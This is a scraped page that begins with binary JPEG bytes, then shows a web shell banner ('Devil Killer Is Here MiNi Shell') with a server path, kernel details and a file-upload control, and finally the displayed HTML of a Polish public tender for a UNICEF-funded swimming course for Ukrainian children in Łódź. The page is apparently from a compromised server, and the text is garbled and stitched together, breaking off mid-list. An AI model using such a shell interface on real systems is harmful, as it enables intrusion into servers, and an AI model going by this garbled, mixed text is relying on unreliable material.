JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250507/0022009001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przeprowadzenie kursu nauki pływania dla 30 dzieci/młodzieży pochodzenia ukraińskiego ze środków Unicef. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">CENTRUM ADMINISTRACYJNE PIECZY ZASTĘPCZEJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 387588281</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Stanisława Małachowskiego 74</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">90-159</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">422088831</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@capz.lodz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.uml.lodz.pl/urzad-miasta/przetargi/zamowienia-publiczne-powyzej-30000-euro-zamowienia-o-wartosci-przekraczajacej-kwote-130-000-zl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przeprowadzenie kursu nauki pływania dla 30 dzieci/młodzieży pochodzenia ukraińskiego ze środków Unicef. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6c709d96-2c60-4f44-94f4-a940cf8103d1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00220090</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-6c709d96-2c60-4f44-94f4-a940cf8103d1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń, odbywa się<br/>przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>2. Postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia (przycisk „Przeglądaj postępowania/konkursy”).<br/>3. Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” .<br/>4. Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości<br/>(przycisk „dodaj załącznik”)</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje za-mieszczone w zakładce „Centrum Pomocy”<br/>2. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>3. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>4. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>5.Ofertę należy złożyć w języku polskim, sporządzoną pod rygorem nieważności, w formie elektronicznej (opatrzoną kwalifikowanym<br/>podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Treść oferty musi<br/>być zgodna z wymaganiami zamawiającego określonymi w dokumentach zamówienia.<br/>6.Oferta musi być sporządzona w języku polskim, w postaci elektronicznej w formacie danych: .pdf, .doc, .docx, .rtf lub .xps i opatrzona kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>7. Wykonawca w celu poprawnego zaszyfrowania oferty powinien mieć zainstalowany na komputerze .NET Framework. Aplikacja<br/>działa na platformie Windows (Vista SP2, 7, 8, 10). Aplikacja nie jest dostępna dla systemu Linux i MAC OS.<br/>8.Do przygotowania oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy kwalifikowanego<br/>podpisu elektronicznego, podpisu osobistego lub podpisu zaufanego.<br/>9.Jeżeli na ofertę składa się kilka dokumentów, Wykonawca powinien stworzyć folder, do którego przeniesie wszystkie dokumenty oferty, podpisane kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. Następnie taki folder<br/>powinien zostać skompresowany do formatu .zip (bez nadawania mu haseł i bez szyfrowania). W kolejnym kroku za pośrednictwem<br/>Aplikacji do szyfrowania Wykonawca zaszyfruje folder zawierający dokumenty składające się na ofertę.<br/>10.Oferta musi być podpisana kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osoby upoważnione do składania oświadczeń woli w imieniu Wykonawcy.<br/>11.Oferta, oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, muszą być złożone w<br/>oryginale tj. w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>12.Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.<br/>13.Dokumenty dotyczące treści oferty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę<br/>na zasadach określonych w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. 2020 poz. 2452).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna wynikająca z art. 13 Rozporządzenia RODO Zgodnie z<br/>rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz.<br/>UEL 119z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1. Administratorem danych osobowych jest CAPZ w Łodzi, ul. Małachowskiego 74 reprezentowane przez Dyrektora.<br/>2. Z Centrum można się skontaktować w następujący sposób:<br/>- listownie: Łódź, 90-159 ul. Małachowskiego 74 ,<br/>- email:sekretariat@capz.lodz.pl,<br/>- telefonicznie: 42 208 88 31.<br/>3. Administrator wyznaczył Inspektora Ochrony Danych, z który można się kontaktować poprzez e-mailem na adres:<br/>iod@capz.lodz.pl<br/>4. Przetwarzanie danych osobowych odbywa się na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowego<br/>postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięcia, jak również zawarcia umowy w sprawie zamówienia<br/>publicznego oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia publicznego i jego archiwizacji;<br/>ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych i ustawy z dnia 23 kwietnia 1964 r. – Kodeks cywilny, w celu związanym<br/>z postępowaniem o udzielenie zamówienia publicznego, którego wartość szacunkowa nie przekracza 130 000 złotych netto;<br/>5. Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o<br/>ustawy z dnia 6 września 2001 r. o dostępie do informacji publicznej.<br/>Odbiorcami do których mogą być przekazane dane osobowe będą strony i uczestnicy postępowań lub organy właściwe do<br/>załatwienia sprawy na mocy przepisów prawa. Centrum Administracyjne Pieczy Zastępczej udostępni dane złożone w ofercie<br/>poprzez publikację na stronie lub na wniosek osób zainteresowanych oraz podmiotom, którym administrator danych powierzył<br/>przetwarzanie danych osobowych na postawie zawartych umów. Dane zostaną udostępnione również w skutek podejmowanych<br/>czynności prowadzonego postępowania.<br/>6. Centrum Administracyjne Pieczy Zastępczej może przekazać dane osobowe upoważnionym podmiotom na podstawie i w<br/>granicach prawa.<br/>7. Dane osobowe będą przetwarzane w Centrum Administracyjne Pieczy Zastępczej do czasu niezbędnego do realizacji zadań<br/>związanych z umową., następnie – w przypadkach, w których wymagają tego przepisy ustawy z dnia 14 lipca 1983 r. o narodowym<br/>zasobie archiwalnym<br/>i archiwach (Dz.U. z 2018 r. poz. 217 ze zm.) – przez czas określony w tych przepisach.<br/>8. Dane osobowe nie podlegają automatyzowanemu podejmowaniu decyzji, w tym profilowaniu.<br/>9. Nie przysługuje:<br/>− prawo do usunięcia danych osobowych w związku z art. 17 ust. 3 lit. b, d lub e RODO;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− prawo sprzeciwu, wobec przetwarzania danych osobowych na podstawie art. 21 RODO, gdyż przesłanką przetwarzania danych<br/>osobowych jest art. 6 ust. 1 lit. c RODO.<br/>10. Dane teleadresowe zostały pozyskane od Wykonawców, źródeł ogólnodostępnych np. zamieszczonych w internecie.<br/>Szczegółowe zapisy w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">1/2025/U</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem umowy jest usługa polegająca na przeprowadzeniu kursu nauki pływania dla 30 dzieci/młodzieży pochodzenia ukraińskiego ze środków Unicef. <br/>2.	Wykonawca zobowiązuje się do zrealizowania łącznie 192 godzin dydaktycznych (grupowych zajęć) w okresie maj 2025 r. do 20 grudnia 2025 r. dla 3 grup x 8h/m-c x 8 m-cy. Na jedną grupę 64 godziny dydaktyczne.<br/>3.	Zajęcia nauki pływania prowadzone będą w grupach liczących maksymalnie 11 osób.<br/>4.	Uczestnikami kursu będą dzieci i młodzież pochodzenia ukraińskiego przebywająca w placówkach na terenie miasta Łodzi.<br/>5.	W terminie do 7 dni od dnia podpisania umowy, Wykonawca zobowiązany jest do przedstawienia Zamawiającemu harmonogramu kursu pływania dla każdej z grup.<br/>6.	W terminie 2 dni roboczych Zamawiający zaakceptuje lub naniesie uwagi do zaproponowanego przez Wykonawcę harmonogramu kursu pływania.<br/>7.	W terminie 2 dni roboczych od przesłania uwag przez Zamawiającego, Wykonawca jest zobowiązany nanieść poprawki oraz przesłać ostateczną wersję harmonogramu Zamawiającemu.<br/>8.	Zajęcia w miesiącach szkolnych będą odbywać się w godzinach popołudniowych (16:00-20:00 poniedziałek-piątek) lub w weekendy (10:00-18:00) w przypadku przerwy wakacyjnej (lipiec-sierpień) zajęcia będą odbywać się w godzinach (10:00-20:00 poniedziałek-piątek) lub w weekendy (10:00-18:00).<br/>9. Wykonawca jest zobowiązany do zapewnienia kursantom podstawowego ubezpieczenia NNW na czas trwania zajęć, na sumę ubezpieczenia nie mniejsza niż 15 000,00 zł i przedstawienia polisy <br/>nie później niż w dniu pierwszych zajęć. Kopia polisy stanowić będzie załącznik nr 2 do umowy. Jeśli w trakcie realizacji umowy okaże się, że powyższa polisa lub inny dokument ubezpieczenia straci ważność obowiązywania, Wykonawca zobowiązany będzie do zachowania ciągłości ubezpieczenia od NNW na okres obowiązywania niniejszej umowy i przedłożenia Zamawiającemu niezwłocznie, nie później niż do 3 dni od daty wygaśnięcia terminu ważności poprzedniej polisy<br/>10.	Kurs nauki pływania prowadzone będą przez osobę/osoby posiadającą/ce uprawnienia instruktora pływania zgodne w szczególności z ustawą z dnia 25 czerwca 2010 r. o sporcie oraz <br/>z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 7 sierpnia 2014 r. w sprawie klasyfikacji zawodów i specjalności na potrzeby rynku pracy oraz zakresu jej stosowania lub odpowiadające im ważne uprawnienia wydane na podstawie innych przepisów prawa lub odpowiednich przepisów obowiązujących na terenie kraju, z którego pochodzi dana osoba. <br/>11.	Wykonawca oświadcza, że wobec osoby/osób wskazanej/ych do realizacji zamówienia nie zachodzą okoliczności wyłączające możliwość pracy z dziećmi i młodzieżą, zgodnie z ustawą z dnia 13 maja 2016r. o przeciwdziałaniu zagrożeniom przestępczością na tle seksualnym (tj. Dz.U. z 2024 r. poz. 560) i osoba ta nie figuruje w Krajowym Rejestrze Karnym w zakresie wskazanym w ww. ustawie. <br/>12.	Umowę niniejszą zawarto na czas określony: od dnia podpisania do dnia 31.12.2025 r. lub do wyczerpania wartości umowy w zależności co nastąpi pierwsze.<br/>13.	Termin realizacji zajęć nauki pływania – Maj-20 grudnia 2025 r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">92600000-7 - Usługi sportowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) kryterium – Cena oferty ,,C” – waga 60% (60% = 60 pkt.)<br/>2) kryterium - dysponowanie instruktorami pływania posiadającymi uprawnienia zgodne z ustawą o sporcie oraz z Rozporządzeniem<br/>Pracy i Polityki Społecznej w sprawie kwalifikacji zawodów i specjalności na potrzeby rynku pracy „D”– waga 40% (40% = 40 pkt.)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dysponowanie instruktorami pływania posiadającymi uprawnienia zgodne z ustawą o sporcie oraz z Rozporządzeniem Pracy i Polityki Społecznej w sprawie kwalifikacji zawodów i specjalności na potrzeby rynku pracy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek zdolności technicznej lub zawodowej zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej 2 osobami posiadającymi uprawnienia instruktora pływania zgodne z ustawą z dnia 25 czerwca 2010 r. o sporcie oraz z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 7 sierpnia 2014 r. w sprawie klasyfikacji zawodów i specjalności na potrzeby rynku pracy oraz zakresu jej stosowania lub odpowiadające im ważne uprawnienia wydane na podstawie innych przepisów prawa lub odpowiednich przepisów obowiązujących na terenie kraju, z którego pochodzi dana osoba.<br/><br/>Spełnienie warunków udziału w postępowaniu będzie weryfikowane na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu oraz od Wykonawcy, który złoży najkorzystniejszą ofertę, Zamawiający od Wykonawcy, który złoży najkorzystniejszą ofertę będzie żądał Wykazu osób wskazanych do realizacji zamówienia – załącznik nr 5 do SWZ.<br/>Każda z osób wskazana przez Wykonawcę w wykazie osób do realizacji zamówienia musi spełniać warunki udziału w postępowaniu.<br/><br/>Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy<br/>może mieć negatywny wpływ na realizację zamówienia.<br/><br/>W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia lub polegania na zdolnościach podmiotów<br/>udostępniających zasoby w/w warunek oceniany będzie łącznie.<br/>Uwaga:<br/>Zamawiający do umowy będzie wymagał kopii uprawnień dla osób wykazanych przez Wykonawcę do realizacji zamówienia<br/>(instruktorów nauki pływania). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty Wykonawca<br/>zobowiązany jest dołączyć:<br/>a) oświadczenie o braku podstaw do wykluczenia z postępowania – zgodnie z załącznikiem nr 4a do SWZ.<br/>b) oświadczenie o braku podstaw do wykluczenia z postępowania, składane na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia<br/>2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego – załącznik nr 10 a do SWZ.<br/>2. Podmiotowe środki dowodowe wymagane od Wykonawcy, którego oferta została najwyżej oceniona obejmuje oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego w art. 108 ust. 1 pkt 3, 108 ust. 1 pkt , 108 ust. 1 pkt 5, 108 ust. 1 pkt 6, oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę<br/>oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2023 r. poz. 129) – załącznik nr 9a do SWZ.<br/>3. Podmiotowe środki dowodowe dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia (spółki cywilne/konsorcja) do oferty, składa każdy z Wykonawców:<br/>a) oświadczenie o braku podstaw do wykluczenia z postępowania – zgodnie z załącznikiem nr 4a do SWZ.<br/>c) oświadczenie o braku podstaw do wykluczenia z postępowania, składane na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego – załącznik nr 10 a do SWZ.<br/>4. Podmiotowe środki dowodowe wymagane od 